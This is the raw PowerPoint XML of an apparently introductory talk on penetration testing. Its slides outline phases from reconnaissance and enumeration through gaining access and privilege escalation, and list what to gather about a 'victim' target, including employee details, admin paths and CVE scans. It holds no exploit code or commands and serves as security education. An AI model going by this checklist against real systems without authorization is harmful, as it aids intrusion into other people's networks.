            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757485" y="2881110"/>
            <a:ext cx="1371722" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSRF BUG</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4628841" y="5675808"/>
            <a:ext cx="1548886" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>403 Forbidden</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322521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P spid="8" grpId="0"/>
      <p:bldP spid="9"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Pentesting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> steps</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="2142067"/>
            <a:ext cx="4016828" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Planning and Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Scanning </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Gaining System Access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Privileges escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>and Reporting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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2428" y="2170557"/>
            <a:ext cx="6211508" cy="3493973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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0104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Planning  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="5334989" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nvolves to make your plan and draw a map for the victim application or network. But without friction with the server or the firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your goal in this section it’s to get this information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social media accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trusted clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Employees list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and their information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Domain and hosting companies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Addresses and contact information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>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421574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Scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> -  enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is the most important stage in penetration testing or a red team project, here when you have to get all the technical information from the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You have to put a TODO list for more organization like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network enumeration: open ports and services – IP Addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firewalls enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subdomains and paths enumeration : admin path, sensitive links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parameters and inputs enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET and POST request enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scan for any possible CVE: http, ftp, MySQL, ssh ..services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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409027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Gaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> System  Access </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10916391" cy="3926223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Believe me, Gaining target machine access it’s the most beautiful moment in your pentesting project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>You are now have a good quantity of information  and vulnerabilities about your target, it’s the time for exploiting them to gain your access into the victim machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For that operation there are several ways, automated and manual exploitation.</a:t>
            </a:r>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4098270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alk">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 xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main"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3.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talk</Template>
  <TotalTime>0</TotalTime>
  <Words>832</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personnalisé</PresentationFormat>
  <Paragraphs>128</Paragraphs>
  <Slides>27</Slides>
  <Notes>3</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Thème</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Titres des diapositives</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="28" baseType="lpstr">
      <vt:lpstr>talk</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>About  me</vt:lpstr>
      <vt:lpstr>WHAT  IS  REAL  HACKING ?</vt:lpstr>
      <vt:lpstr>WHAT  IS  REAL  HACKING ?</vt:lpstr>
      <vt:lpstr>Pentesting  steps</vt:lpstr>
      <vt:lpstr>Planning  and  Reconnaissance</vt:lpstr>
      <vt:lpstr>Scanning  -  enumeration</vt:lpstr>
      <vt:lpstr>Gaining  System  Access </vt:lpstr>
      <vt:lpstr>Gaining  System  Access </vt:lpstr>
      <vt:lpstr>Gaining  System  Access </vt:lpstr>
      <vt:lpstr>Privileges  escalation</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>CAPTUR  THE  FLAG - ctf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Cyber  security  jobs</vt:lpstr>
      <vt:lpstr>Q&amp;A</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2022-03-16T13:07:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-20T13:17:38Z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